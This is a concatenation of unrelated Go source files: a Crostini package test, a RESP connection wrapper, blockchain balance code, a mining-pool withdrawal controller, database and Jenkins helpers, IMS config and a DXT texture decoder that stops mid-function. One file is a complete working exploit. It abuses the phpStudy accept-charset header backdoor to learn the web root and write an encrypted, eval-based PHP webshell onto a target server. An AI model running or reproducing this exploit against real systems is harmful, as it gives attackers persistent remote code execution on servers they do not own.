				ExtraSoftwareDeps: []string{"dlc"},
				ExtraHardwareDeps: crostini.CrostiniStable,
				Fixture:           "crostiniBuster",
				Timeout:           7 * time.Minute,
			}, {
				Name:              "buster_unstable",
				ExtraAttr:         []string{"informational"},
				ExtraSoftwareDeps: []string{"dlc"},
				ExtraHardwareDeps: crostini.CrostiniUnstable,
				Fixture:           "crostiniBuster",
				Timeout:           7 * time.Minute,
			}, {
				Name:              "bullseye_stable",
				ExtraSoftwareDeps: []string{"dlc"},
				ExtraHardwareDeps: crostini.CrostiniStable,
				Fixture:           "crostiniBullseye",
				Timeout:           7 * time.Minute,
			}, {
				Name:              "bullseye_unstable",
				ExtraAttr:         []string{"informational"},
				ExtraSoftwareDeps: []string{"dlc"},
				ExtraHardwareDeps: crostini.CrostiniUnstable,
				Fixture:           "crostiniBullseye",
				Timeout:           7 * time.Minute,
			},
		},
	})
}
// PackageInfo copies a known .deb file into the Crostini container, asks
// the container for its Linux package info, and checks that the returned
// package id has the expected prefix.
func PackageInfo(ctx context.Context, s *testing.State) {
	cont := s.FixtValue().(crostini.FixtureData).Cont
	cr := s.FixtValue().(crostini.FixtureData).Chrome
	// The container-side home directory is named after the local part of
	// the signed-in user's email address.
	filePath := fmt.Sprintf("/home/%s/package.deb", strings.Split(cr.NormalizedUser(), "@")[0])
	if err := crostini.TransferToContainer(ctx, cont, s.DataPath("package.deb"), filePath); err != nil {
		s.Fatal("Failed to transfer .deb to the container: ", err)
	}
	// Clean up the copied file even if the assertions below fail.
	defer func() {
		if err := crostini.RemoveContainerFile(ctx, cont, filePath); err != nil {
			s.Fatal("Failed to remove .deb from the container: ", err)
		}
	}()
	packageID, err := cont.LinuxPackageInfo(ctx, filePath)
	if err != nil {
		s.Fatal("Failed getting LinuxPackageInfo: ", err)
	}
	if !strings.HasPrefix(packageID, "cros-tast-tests;") {
		s.Fatal("LinuxPackageInfo returned an incorrect package id: ", packageID)
	}
	s.Log("Package ID: " + packageID)
}
|
package gedis
import (
"bufio"
"fmt"
"net"
)
// Connection wraps a client's net.Conn with buffered reader and writer.
type Connection struct {
	conn   net.Conn
	reader *bufio.Reader
	writer *bufio.Writer
}
// newConnection builds a Connection around conn, attaching buffered I/O.
func newConnection(conn net.Conn) *Connection {
	c := &Connection{conn: conn}
	c.reader = bufio.NewReader(conn)
	c.writer = bufio.NewWriter(conn)
	return c
}
// WriteSimpleString frames msg as a RESP simple string ("+msg\r\n") and
// flushes it to the client.
// NOTE(review): the WriteString and Flush errors are silently dropped, so
// a broken connection is not observable here — confirm this is intended.
func (c *Connection) WriteSimpleString(msg string) {
	c.writer.WriteString(simpleString(msg))
	c.writer.Flush()
}
// Close closes the underlying network connection. Any buffered but
// unflushed writes are discarded.
func (c *Connection) Close() error {
	return c.conn.Close()
}
// simpleString frames str in the RESP simple-string wire format:
// a '+' prefix followed by the text and a CRLF terminator.
func simpleString(str string) string {
	return "+" + str + "\r\n"
}
|
// SPDX-License-Identifier: ISC
// Copyright (c) 2014-2020 Bitmark Inc.
// Use of this source code is governed by an ISC
// license that can be found in the LICENSE file.
package reservoir
import (
"bytes"
"encoding/binary"
"github.com/bitmark-inc/bitmarkd/account"
"github.com/bitmark-inc/bitmarkd/merkle"
"github.com/bitmark-inc/bitmarkd/storage"
"github.com/bitmark-inc/logger"
)
// BalanceInfo - result returned by store share
type BalanceInfo struct {
	ShareId   merkle.Digest `json:"shareId"`   // share identifier
	Confirmed uint64        `json:"confirmed"` // confirmed amount from storage
	Spend     uint64        `json:"spend"`     // pending (unconfirmed) spend amount
	Available uint64        `json:"available"` // Confirmed minus Spend
}
// shareBalance - get a list of balances
//
// Keys in the pool are laid out as owner bytes followed by the share
// digest, so seeking to owner||startShareId and scanning forward walks
// all of one owner's shares in digest order.
func shareBalance(owner *account.Account, startShareId merkle.Digest, count int, pool storage.Handle) ([]BalanceInfo, error) {
	ownerBytes := owner.Bytes()
	prefix := append(ownerBytes, startShareId[:]...)
	cursor := pool.NewFetchCursor().Seek(prefix)
	items, err := cursor.Fetch(count)
	if nil != err {
		return nil, err
	}
	records := make([]BalanceInfo, 0, len(items))
loop:
	for _, item := range items {
		n := len(item.Key)
		split := n - len(startShareId)
		if split <= 0 {
			logger.Panicf("split cannot be <= 0: %d", split)
		}
		// stop as soon as a key no longer belongs to this owner
		itemOwner := item.Key[:n-len(startShareId)]
		if !bytes.Equal(ownerBytes, itemOwner) {
			break loop
		}
		// the first 8 bytes of the value hold the confirmed amount
		value := binary.BigEndian.Uint64(item.Value[:8])
		var shareId merkle.Digest
		copy(shareId[:], item.Key[split:])
		// pending spends are tracked in memory under the global read lock
		spendKey := makeSpendKey(owner, shareId)
		globalData.RLock()
		spend := globalData.spend[spendKey]
		globalData.RUnlock()
		records = append(records, BalanceInfo{
			ShareId:   shareId,
			Confirmed: value,
			Spend:     spend,
			Available: value - spend,
		})
	}
	return records, nil
}
|
package main
import (
"encoding/base64"
"flag"
"fmt"
"net/http"
"os"
"strings"
"github.com/PuerkitoBio/goquery"
)
// httpDo uploads a PHP webshell to the target by abusing the phpstudy
// "accept-charset" header backdoor: it base64-encodes a
// file_put_contents() payload into that header, then requests the written
// file to report success.
//
// SECURITY(review): this is offensive exploit tooling. It must not be run
// against systems without explicit authorization.
func httpDo(url string, file string, wwwroot string) {
	client := &http.Client{}
	// PHP source of the webshell that gets written to the target's web root.
	shell := `
<?php
@error_reporting(0);
session_start();
if (isset($_GET['help']))
{
	$key=substr(md5(uniqid(rand())),16);
	$_SESSION['k']=$key;
	print $key;
}
else
{
	$key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		for($i=0;$i<strlen($post);$i++) {
			 $post[$i] = $post[$i]^$key[$i+1&15];
			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
	$arr=explode('|',$post);
	$func=$arr[0];
	$params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
	@new C($params);
}
?>
`
	payload := "file_put_contents(\"" + wwwroot + "/" + file + "\"," + shell + ");"
	fmt.Println(payload)
	str := []byte(payload)
	payloads := base64.StdEncoding.EncodeToString(str)
	req, err := http.NewRequest("GET", url+"/index.php", nil)
	if err != nil {
		fmt.Println("主机可能不存活!!")
		os.Exit(0)
	}
	// The base64 payload rides in the accept-charset header (the backdoor's
	// trigger); the other headers mimic a normal browser request.
	req.Header.Set("Accept", "*/*")
	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36")
	req.Header.Set("Accept-Encoding", "gzip,deflate")
	req.Header.Set("accept-charset", payloads)
	req.Header.Set("Connection", "keep-alive")
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println("主机可能不存活")
	} else {
		defer resp.Body.Close()
	}
	// Probe the uploaded file to verify the write succeeded.
	shellurl := url + "/" + file
	reqshell, err := http.Get(shellurl)
	if err != nil {
		fmt.Println("上传失败")
		return
	} else {
		fmt.Println("上传成功, webshell地址:" + shellurl)
	}
	defer reqshell.Body.Close()
}
// main parses -u (target URL) and -f (webshell filename), resolves the
// target's web root via getroot, then uploads the shell with httpDo.
// NOTE(review): the usage string mentions a -p flag that is not defined,
// and omits the required -u flag — confirm the intended CLI.
func main() {
	var url string
	// var password string
	var file string
	flag.StringVar(&url, "u", "", "http(s)://url")
	// flag.StringVar(&password, "p", "pass", "webshell's password")
	flag.StringVar(&file, "f", "webshell.php", "webshell's filename")
	flag.Parse()
	if url == "" {
		fmt.Println("use : phpstudy_webshell.exe -f webshell's filename -p webshell's password")
		os.Exit(0)
	}
	wwwroot := getroot(url)
	httpDo(url, file, wwwroot)
}
// getroot fetches phpinfo() output through the same backdoored
// accept-charset header ("cGhwaW5mbygpOw==" is base64 for "phpinfo();")
// and scrapes DOCUMENT_ROOT from the rendered table to learn the web root.
// (original note: goquery probably has a simpler way to read table values)
// NOTE(review): the error from client.Do is not checked before resp.Body
// is dereferenced — a nil response would panic here.
func getroot(url string) string {
	var list []string
	var wwwroot string
	client := &http.Client{}
	req, err := http.NewRequest("GET", url+"/index.php", nil)
	if err != nil {
		fmt.Println("主机可能不存活!!")
		os.Exit(0)
	}
	req.Header.Set("Accept", "*/*")
	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36")
	req.Header.Set("Accept-Encoding", "gzip,deflate")
	req.Header.Set("accept-charset", "cGhwaW5mbygpOw==")
	req.Header.Set("Connection", "keep-alive")
	resp, err := client.Do(req)
	defer resp.Body.Close()
	body, _ := goquery.NewDocumentFromReader(resp.Body)
	// Collect every table cell; DOCUMENT_ROOT's value is the next cell
	// after its label.
	body.Find("td").Each(func(i int, selection *goquery.Selection) {
		list = append(list, strings.TrimSpace(selection.Text()))
	})
	for i, text := range list {
		if text == "DOCUMENT_ROOT" || text == "_SERVER[\"DOCUMENT_ROOT\"]" {
			fmt.Println("路径:" + list[i+1])
			wwwroot = list[i+1]
			break
		}
	}
	return wwwroot
}
|
package main
import "testing"
// TestAnswerComparisonWellFormed checks that identical, already-clean
// strings compare as equal.
func TestAnswerComparisonWellFormed(t *testing.T) {
	input, answer := "Buenos Aires", "Buenos Aires"
	got := compareAnswers(input, answer)
	if !got {
		t.Errorf("compareAnswers(%s, %s) = %v, want %v", input, answer, got, true)
	}
}
// TestAnswerComparisonBadlyFormed checks that strings with stray
// leading/trailing whitespace still compare as equal.
func TestAnswerComparisonBadlyFormed(t *testing.T){
	// it should tolerate surrounding whitespace in either argument
	wfInput := " Buenos Aires"
	wfAnswer := "Buenos Aires "
	if got := compareAnswers(wfInput, wfAnswer); got != true {
		t.Errorf("compareAnswers(%s, %s) = %v, want %v", wfInput, wfAnswer, got, true)
	}
}
|
package problem0044
// isMatch reports whether s matches the wildcard pattern p, where '?'
// matches exactly one character and '*' matches any sequence of
// characters, including the empty one. Classic O(len(s)*len(p)) dynamic
// programming over prefixes.
func isMatch(s string, p string) bool {
	ls, lp := len(s), len(p)
	// dp[i][j] reports whether s[:i] matches p[:j].
	dp := make([][]bool, ls+1)
	for i := range dp {
		dp[i] = make([]bool, lp+1)
	}
	// The empty string matches the empty pattern.
	dp[0][0] = true
	// Only a run of leading '*' can match the empty string; the first
	// non-'*' keeps every later dp[0][j] false.
	for j := 1; j <= lp; j++ {
		if p[j-1] == '*' {
			dp[0][j] = dp[0][j-1]
		}
	}
	for i := 1; i <= ls; i++ {
		for j := 1; j <= lp; j++ {
			if p[j-1] == '*' {
				// '*' either absorbs s[i-1] (dp[i-1][j]) or matches the
				// empty sequence (dp[i][j-1]).
				dp[i][j] = dp[i-1][j] || dp[i][j-1]
			} else {
				// A literal or '?' must match s[i-1], and the shorter
				// prefixes must already match.
				dp[i][j] = dp[i-1][j-1] && (p[j-1] == s[i-1] || p[j-1] == '?')
			}
		}
	}
	return dp[ls][lp]
}
|
package controller
import (
"github.com/gin-gonic/gin"
"net/http"
"strconv"
"xpool/models"
)
// Income is the shared handler instance the router binds routes to.
var Income income = income{}

// income groups the gin handlers for income queries and withdrawals.
type income struct{}
// IncomeTotal returns the caller's total income.
func (u *income) IncomeTotal(c *gin.Context) {
	token := c.PostForm("token")
	c.JSON(http.StatusOK, IncomeTotalServices(token))
}

// IncomeBalance returns the caller's withdrawable income balance.
func (u *income) IncomeBalance(c *gin.Context) {
	token := c.PostForm("token")
	c.JSON(http.StatusOK, IncomeBalanceServices(token))
}

// ExtractIncomeBalance files a withdrawal request for the given value,
// re-checking the caller's password.
func (u *income) ExtractIncomeBalance(c *gin.Context) {
	value := c.PostForm("value")
	token := c.PostForm("token")
	password := c.PostForm("password")
	c.JSON(http.StatusOK, ExtractIncomeBalanceServices(token, value, password))
}

// ExtractIncomeList pages through the caller's own withdrawal records.
func (u *income) ExtractIncomeList(c *gin.Context) {
	page := c.PostForm("page")
	pageSize := c.PostForm("pageSize")
	token := c.PostForm("token")
	c.JSON(http.StatusOK, ExtractIncomeListServices(page, pageSize, token))
}

// AdminExtractIncomeList pages through all withdrawal records (admin view).
func (u *income) AdminExtractIncomeList(c *gin.Context) {
	page := c.PostForm("page")
	pageSize := c.PostForm("pageSize")
	token := c.PostForm("token")
	c.JSON(http.StatusOK, AdminExtractIncomeListServices(page, pageSize, token))
}

// ExtractIncomeReview approves or rejects a pending withdrawal (admin).
func (u *income) ExtractIncomeReview(c *gin.Context) {
	reviewId := c.PostForm("reviewId")
	reason := c.PostForm("reason")
	token := c.PostForm("token")
	password := c.PostForm("password")
	statesStr := c.PostForm("states")
	c.JSON(http.StatusOK, ExtractIncomeReviewServices(reviewId, reason, token, password, statesStr))
}
// IncomeTotalServices resolves the user from token and returns the user's
// total income, or an error response when the token is invalid.
func IncomeTotalServices(token string) Response {
	user := GetUserInfoByToken(token)
	if user.Email == "" {
		return ResponseFun("token 无效", 40000)
	}
	income := models.GetIncomeInfoById(user.Email)
	return ResponseFun(Decimal(income.TotalIncome), 200)
}
// IncomeBalanceServices resolves the user from token and returns the
// user's current withdrawable balance, or an error response when the
// token is invalid.
func IncomeBalanceServices(token string) Response {
	user := GetUserInfoByToken(token)
	if user.Email == "" {
		return ResponseFun("token 无效", 40002)
	}
	income := models.GetIncomeInfoById(user.Email)
	return ResponseFun(Decimal(income.IncomeBalance), 200)
}
// ExtractIncomeBalanceServices validates the caller and amount, then files
// a withdrawal request: the amount is deducted from the income balance and
// a pending record is saved for review.
func ExtractIncomeBalanceServices(token, valueStr, password string) Response {
	userInfo := GetUserInfoByToken(token)
	if "" == userInfo.Address {
		return ResponseFun("获取地址失败", 20026)
	}
	// Withdrawals are password-confirmed even with a valid token.
	if !CheckPassword(token, password) {
		return ResponseFun("密码错误", 20028)
	}
	value, err := strconv.ParseFloat(valueStr, 64)
	if nil != err {
		return ResponseFun("提取金额错误", 20030)
	}
	GetIncomeInfo := models.GetIncomeInfoById(userInfo.Email)
	// Remaining balance after the withdrawal, rounded to 3 decimal places.
	balance := Round(GetIncomeInfo.IncomeBalance-value, 3)
	if 0 > balance {
		return ResponseFun("余额不足", 20032)
	}
	result := models.SaveIncome(1, userInfo.Email, value, balance, userInfo.Id)
	if true != result {
		return ResponseFun("申请提取余额失败", 20034)
	}
	return ResponseFun("申请提取余额成功", 200)
}
// IncomeList is the paged payload returned by the withdrawal-list
// endpoints.
type IncomeList struct {
	ExtractIncome []models.ExtractIncome `json:"extract_income"`
	Page          int                    `json:"page"`
	PageSize      int                    `json:"pageSize"`
	Total         int                    `json:"total"`
}
// ExtractIncomeListServices returns a page of the caller's withdrawal
// records. Invalid paging parameters fall back to sane defaults: page 1
// and a page size clamped to the range [1, 100].
func ExtractIncomeListServices(pageStr, pageSizeStr, token string) Response {
	userInfo := GetUserInfoByToken(token)
	if "" == userInfo.Email {
		return ResponseFun("token 无效", 20014)
	}
	page, err := strconv.Atoi(pageStr)
	if nil != err {
		page = 1
	}
	pageSize, err := strconv.Atoi(pageSizeStr)
	if nil != err {
		pageSize = 100
	}
	if 0 >= page {
		page = 1
	}
	// Clamp the page size to [1, 100]; the original let 0 or negative
	// values through to the query layer.
	if 0 >= pageSize {
		pageSize = 100
	}
	if 100 < pageSize {
		pageSize = 100
	}
	return ResponseFun(IncomeList{
		ExtractIncome: models.GetExtractIncomeListByEmail(userInfo.Email, page, pageSize),
		Page:          page,
		PageSize:      pageSize,
		Total:         models.GetExtractIncomeCountByEmail(userInfo.Email),
	}, 200)
}
// ExtractIncomeReviewServices lets an admin approve or reject a pending
// withdrawal. states must be 3 or 5; when states is 5 the withdrawn value
// is added back onto the user's balance (presumably 5 = reject/refund,
// 3 = approve — confirm against the models layer).
func ExtractIncomeReviewServices(reviewId, reason, token, password, statesStr string) Response {
	userInfo := GetUserInfoByToken(token)
	states, err := strconv.Atoi(statesStr)
	if nil != err {
		return ResponseFun("参数错误", 20024)
	}
	if 3 != states && 5 != states {
		return ResponseFun("参数错误", 20026)
	}
	if "" == userInfo.Email {
		return ResponseFun("token 无效", 20016)
	}
	// Reviewing requires the admin role plus a password re-check.
	if !VerifyAdminRole(userInfo) {
		return ResponseFun("无权限操作", 20018)
	}
	if !CheckPassword(token, password) {
		return ResponseFun("密码错误", 20020)
	}
	extractIncomeInfo := models.GetExtractIncomeInfoById(reviewId)
	// Only records still in state 1 (pending) may be reviewed.
	if 1 != extractIncomeInfo.State {
		return ResponseFun("操作错误", 20022)
	}
	incomeInfo := models.GetIncomeInfoById(extractIncomeInfo.Email)
	var value float64
	if 5 == states {
		// Rejection: restore the withdrawn value onto the balance.
		value = extractIncomeInfo.Value + incomeInfo.IncomeBalance
	}
	result := models.UpdateExtractIncome(states, value, reason, extractIncomeInfo.Email, extractIncomeInfo.ID, userInfo.Id)
	if true == result {
		return ResponseFun("审核成功", 200)
	} else {
		return ResponseFun("审核失败", 20024)
	}
}
package taosTool
import (
"database/sql"
"fmt"
_ "github.com/satng/sensors-gateway-grpc/taosSql"
"os"
"time"
)
// Connection settings for the local TDengine instance.
const (
	CONNDB = "%s:%s@/tcp(%s)/%s" // DSN template: user:pass@/tcp(host)/db
	DRIVER = "taosSql"
	DBHOST = "127.0.0.1"
	DBUSER = "root"
	DBPASS = "taosdata"
	DBNAME = "sensors_test"
)

var (
	// globalDB is the shared connection pool opened by InitDB and closed
	// by CloseDB.
	globalDB *sql.DB
)
// InitDB opens the shared TDengine connection pool and selects the target
// database, exiting the process on failure.
func InitDB() {
	// open connect to taos server
	connStr := fmt.Sprintf(CONNDB, DBUSER, DBPASS, DBHOST, DBNAME)
	db, err := sql.Open(DRIVER, connStr)
	if err != nil {
		// fmt.Println does not interpret format verbs — Printf is required
		// for the error to actually be rendered — and a failed init should
		// exit non-zero.
		fmt.Printf("Open database error: %s\n", err)
		os.Exit(1)
	}
	globalDB = db
	_, err = globalDB.Exec("use " + DBNAME)
	checkErr(err)
	fmt.Println("Taos database ok")
}
// CloseDB closes the shared connection pool opened by InitDB.
func CloseDB() {
	globalDB.Close()
}
// Insert executes the given INSERT statement on the shared pool and prints
// the number of affected rows together with the elapsed wall-clock time.
func Insert(sql string) {
	start := time.Now()
	res, err := globalDB.Exec(sql)
	if err != nil {
		fmt.Println(err.Error())
		return
	}
	affected, err := res.RowsAffected()
	if err != nil {
		fmt.Println(err.Error())
		return
	}
	// time.Since measures real elapsed time. The original subtracted
	// time.Now().Nanosecond() values, which only compare the nanosecond
	// component within the current second and go wrong (even negative)
	// whenever the call spans a second boundary.
	fmt.Printf("insert data result:\n %d row(s) affectd (%6.6fs)\n\n", affected, time.Since(start).Seconds())
}
// checkErr panics when err is non-nil; used for unrecoverable setup
// failures during initialization.
func checkErr(err error) {
	if err == nil {
		return
	}
	panic(err)
}
|
package jenkinsbinding
import (
"log"
devopsv1alpha1 "alauda.io/devops-apiserver/pkg/apis/devops/v1alpha1"
devopsclient "alauda.io/devops-apiserver/pkg/client/clientset/versioned"
"alauda.io/diablo/src/backend/api"
"alauda.io/diablo/src/backend/errors"
"alauda.io/diablo/src/backend/resource/common"
"alauda.io/diablo/src/backend/resource/dataselect"
"k8s.io/client-go/kubernetes"
)
// JenkinsBindingList contains a list of jenkins in the cluster.
type JenkinsBindingList struct {
	ListMeta api.ListMeta `json:"listMeta"`

	// Unordered list of JenkinsBinding.
	Items []JenkinsBinding `json:"jenkinsbindings"`

	// List of non-critical errors, that occurred during resource retrieval.
	Errors []error `json:"errors"`
}

// JenkinsBinding is a presentation layer view of Kubernetes namespaces. This means it is namespace plus
// additional augmented data we can get from other sources.
type JenkinsBinding struct {
	ObjectMeta api.ObjectMeta `json:"objectMeta"`
	TypeMeta   api.TypeMeta   `json:"typeMeta"`
	Spec       devopsv1alpha1.JenkinsBindingSpec   `json:"spec"`
	Status     devopsv1alpha1.JenkinsBindingStatus `json:"status"`
}

// APIResponse wraps a cron-check result together with its status string.
type APIResponse struct {
	Data   CronCheckResult `json:"data"`
	Status string          `json:"status"`
}

// CronCheckResult describes the next/previous run of a cron expression
// plus localized sanity messages and an optional error.
type CronCheckResult struct {
	Next     string `json:"next"`
	Previous string `json:"previous"`
	SanityZh string `json:"sanity_zh_cn"`
	SanityEn string `json:"sanity_en"`
	Error    string `json:"error"`
}
// // GetProjectListFromChannels returns a list of all namespaces in the cluster.
// func GetProjectListFromChannels(channels *common.ResourceChannels, dsQuery *dataselect.DataSelectQuery) (*JenkinsBindingList, error) {
// jenkins := <-channels.JenkinsBindingList.List
// err := <-channels.JenkinsBindingList.Error
// nonCriticalErrors, criticalError := errors.HandleError(err)
// if criticalError != nil {
// return nil, criticalError
// }
// return toJenkinsBindingList(jenkins.Items, nil, nonCriticalErrors, dsQuery), nil
// }
// GetJenkinsBindingList returns a list of all jenkins bindings in the
// given namespace, filtered and paged by dsQuery. Non-critical listing
// errors are reported in the result; critical errors abort the call.
func GetJenkinsBindingList(client devopsclient.Interface, k8sclient kubernetes.Interface,
	namespace *common.NamespaceQuery, dsQuery *dataselect.DataSelectQuery) (*JenkinsBindingList, error) {
	log.Println("Getting list of jenkins")
	jenkinsList, err := client.DevopsV1alpha1().JenkinsBindings(namespace.ToRequestParam()).List(api.ListEverything)
	if err != nil {
		log.Println("error while listing jenkins", err)
	}
	nonCriticalErrors, criticalError := errors.HandleError(err)
	if criticalError != nil {
		return nil, criticalError
	}
	// If the error was classified as non-critical, jenkinsList can be nil;
	// guard before dereferencing .Items (the original would panic here).
	if jenkinsList == nil {
		return toJenkinsBindingList(nil, nonCriticalErrors, dsQuery), nil
	}
	return toJenkinsBindingList(jenkinsList.Items, nonCriticalErrors, dsQuery), nil
}
// toJenkinsBindingList applies the data-select filter/pagination to the raw
// bindings and converts each survivor to its presentation form.
func toJenkinsBindingList(jenkins []devopsv1alpha1.JenkinsBinding, nonCriticalErrors []error, dsQuery *dataselect.DataSelectQuery) *JenkinsBindingList {
	jenkinsCells, filteredTotal := dataselect.GenericDataSelectWithFilter(toCells(jenkins), dsQuery)
	jenkins = fromCells(jenkinsCells)
	// Build the list once with the filtered total; the original assigned
	// ListMeta twice (first with len(jenkins), immediately overwritten),
	// which was a dead store.
	jenkinsList := &JenkinsBindingList{
		Items:    make([]JenkinsBinding, 0, len(jenkins)),
		ListMeta: api.ListMeta{TotalItems: filteredTotal},
		Errors:   nonCriticalErrors,
	}
	for _, jenk := range jenkins {
		jenkinsList.Items = append(jenkinsList.Items, toJenkinsBinding(jenk))
	}
	return jenkinsList
}
// toJenkinsBinding converts one JenkinsBinding resource to its
// presentation form, tagging the standard tool-chain annotations.
func toJenkinsBinding(jenkins devopsv1alpha1.JenkinsBinding) JenkinsBinding {
	binding := JenkinsBinding{
		ObjectMeta: api.NewObjectMeta(jenkins.ObjectMeta),
		TypeMeta:   api.NewTypeMeta(api.ResourceKindJenkinsBinding),
		// data here
		Spec:   jenkins.Spec,
		Status: jenkins.Status,
	}
	annotations := binding.ObjectMeta.Annotations
	if annotations == nil {
		annotations = make(map[string]string)
		binding.ObjectMeta.Annotations = annotations
	}
	annotations[common.AnnotationsKeyToolType] = devopsv1alpha1.ToolChainContinuousIntegrationName
	annotations[common.AnnotationsKeyToolItemKind] = devopsv1alpha1.ResourceKindJenkins
	annotations[common.AnnotationsKeyToolItemType] = ""
	annotations[common.AnnotationsKeyToolItemPublic] = "false"
	return binding
}
|
// Copyright 2020 Adobe. All rights reserved.
// This file is licensed to you under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License. You may obtain a copy
// of the License at http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software distributed under
// the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
// OF ANY KIND, either express or implied. See the License for the specific language
// governing permissions and limitations under the License.
package ims
import (
"net/url"
)
// Config carries the IMS endpoint, credential, and request settings used
// by the client commands.
type Config struct {
	URL               string
	ClientID          string
	ClientSecret      string
	ServiceToken      string
	PrivateKeyPath    string
	Organization      string
	Account           string
	Scopes            []string
	Metascopes        []string
	AccessToken       string
	RefreshToken      string
	DeviceToken       string
	AuthorizationCode string
	ProfileApiVersion string
	OrgsApiVersion    string
	Timeout           int
	ProxyURL          string
	ProxyIgnoreTLS    bool
	UserID            string
}

// TokenInfo describes an access token together with its validity state.
type TokenInfo struct {
	AccessToken string
	Expires     int //(response.ExpiresIn * time.Millisecond),
	Valid       bool
	Info        string
}
// validateURL reports whether u parses as an absolute URL carrying both a
// scheme and a host component.
func validateURL(u string) bool {
	parsed, err := url.Parse(u)
	if err != nil {
		return false
	}
	return parsed.Scheme != "" && parsed.Host != ""
}
|
// Copyright (C) 2017 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package image
import (
"bytes"
"github.com/google/gapid/core/data/binary"
"github.com/google/gapid/core/data/endian"
"github.com/google/gapid/core/math/sint"
"github.com/google/gapid/core/os/device"
)
// init registers converters that decode the four S3TC/DXT block-compressed
// formats into RGBA_U8_NORM. The DXT1 variants differ only in how the
// "black" code point is handled (RGB keeps alpha, RGBA zeroes it).
func init() {
	RegisterConverter(S3_DXT1_RGB, RGBA_U8_NORM, func(src []byte, w, h, d int) ([]byte, error) {
		return decode4x4Blocks(src, w, h, d, func(r binary.Reader, dst []pixel) {
			decodeDXT1(r, dst, func(p *pixel) {
				p.setToBlackRGB()
			})
		})
	})
	RegisterConverter(S3_DXT1_RGBA, RGBA_U8_NORM, func(src []byte, w, h, d int) ([]byte, error) {
		return decode4x4Blocks(src, w, h, d, func(r binary.Reader, dst []pixel) {
			decodeDXT1(r, dst, func(p *pixel) {
				p.setToBlackRGBA()
			})
		})
	})
	RegisterConverter(S3_DXT3_RGBA, RGBA_U8_NORM, func(src []byte, w, h, d int) ([]byte, error) {
		return decode4x4Blocks(src, w, h, d, func(r binary.Reader, dst []pixel) {
			// DXT3: explicit 4-bit alpha block precedes the color block.
			decodeAlphaDXT3(r, dst)
			decodeColorDXT3_5(r, dst)
		})
	})
	RegisterConverter(S3_DXT5_RGBA, RGBA_U8_NORM, func(src []byte, w, h, d int) ([]byte, error) {
		return decode4x4Blocks(src, w, h, d, func(r binary.Reader, dst []pixel) {
			// DXT5: interpolated alpha block precedes the color block.
			decodeAlphaDXT5(r, dst)
			decodeColorDXT3_5(r, dst)
		})
	})
}
// pixel is a working RGBA value with 8-bit-range int channels.
type pixel struct {
	r, g, b, a int
}

// setToBlackRGB zeroes the color channels, leaving alpha untouched.
func (p *pixel) setToBlackRGB() {
	p.r, p.g, p.b = 0, 0, 0
}

// setToBlackRGBA zeroes color and alpha (transparent black).
func (p *pixel) setToBlackRGBA() {
	p.r, p.g, p.b, p.a = 0, 0, 0, 0
}

// setColorFrom copies c's color channels, leaving alpha untouched.
func (p *pixel) setColorFrom(c pixel) {
	p.r, p.g, p.b = c.r, c.g, c.b
}

// setToAverage sets the color to the midpoint of c0 and c1.
func (p *pixel) setToAverage(c0, c1 pixel) {
	p.r = (c0.r + c1.r) / 2
	p.g = (c0.g + c1.g) / 2
	p.b = (c0.b + c1.b) / 2
}

// setToMix3 sets the color to the 2/3–1/3 blend of c0 and c1.
func (p *pixel) setToMix3(c0, c1 pixel) {
	p.r = (2*c0.r + c1.r) / 3
	p.g = (2*c0.g + c1.g) / 3
	p.b = (2*c0.b + c1.b) / 3
}
// decode4x4Blocks walks src as a stream of little-endian 4x4 compressed
// blocks (slice by slice, then row-major in 4-pixel steps), decodes each
// via decodeBlock, and scatters the 16 pixels into an RGBA byte buffer.
func decode4x4Blocks(src []byte, width, height, depth int, decodeBlock func(r binary.Reader, dst []pixel)) ([]byte, error) {
	dst := make([]byte, width*height*depth*4)
	// block is reused as the 16-pixel scratch area for every decoded block.
	block := make([]pixel, 16)
	r := endian.Reader(bytes.NewReader(src), device.LittleEndian)
	for z := 0; z < depth; z++ {
		// Rebind dst to the start of this depth slice.
		dst := dst[z*width*height*4:]
		for y := 0; y < height; y += 4 {
			for x := 0; x < width; x += 4 {
				decodeBlock(r, block)
				copyToDest(block, dst, x, y, width, height)
			}
		}
	}
	return dst, nil
}
// expand565 unpacks a 5:6:5-packed RGB value into 8-bit channels,
// replicating each channel's high bits into its low bits so the full
// 0..255 range is reachable. The alpha of 1 is a placeholder; callers
// appear to overwrite or ignore it.
func expand565(c int) pixel {
	return pixel{
		((c >> 8) & 0xf8) | ((c >> 13) & 0x7),
		((c >> 3) & 0xfc) | ((c >> 9) & 0x3),
		((c << 3) & 0xf8) | ((c >> 2) & 0x7),
		1,
	}
}
// decodeDXT1 decodes one DXT1 block: two 565 endpoint colors followed by
// 16 two-bit selector codes. When c0 > c1 the block uses two interpolated
// colors; otherwise code 2 is the average and code 3 is "black", whose
// exact meaning (keep or clear alpha) is supplied by the caller.
func decodeDXT1(r binary.Reader, dst []pixel, black func(p *pixel)) {
	c0, c1, codes := r.Uint16(), r.Uint16(), r.Uint32()
	p0, p1 := expand565(int(c0)), expand565(int(c1))
	for i := 0; i < 16; i++ {
		// Alpha defaults to opaque; only the "black" callback may clear it.
		dst[i].a = 255
		switch codes & 0x3 {
		case 0:
			dst[i].setColorFrom(p0)
		case 1:
			dst[i].setColorFrom(p1)
		case 2:
			if c0 > c1 {
				dst[i].setToMix3(p0, p1)
			} else {
				dst[i].setToAverage(p0, p1)
			}
		case 3:
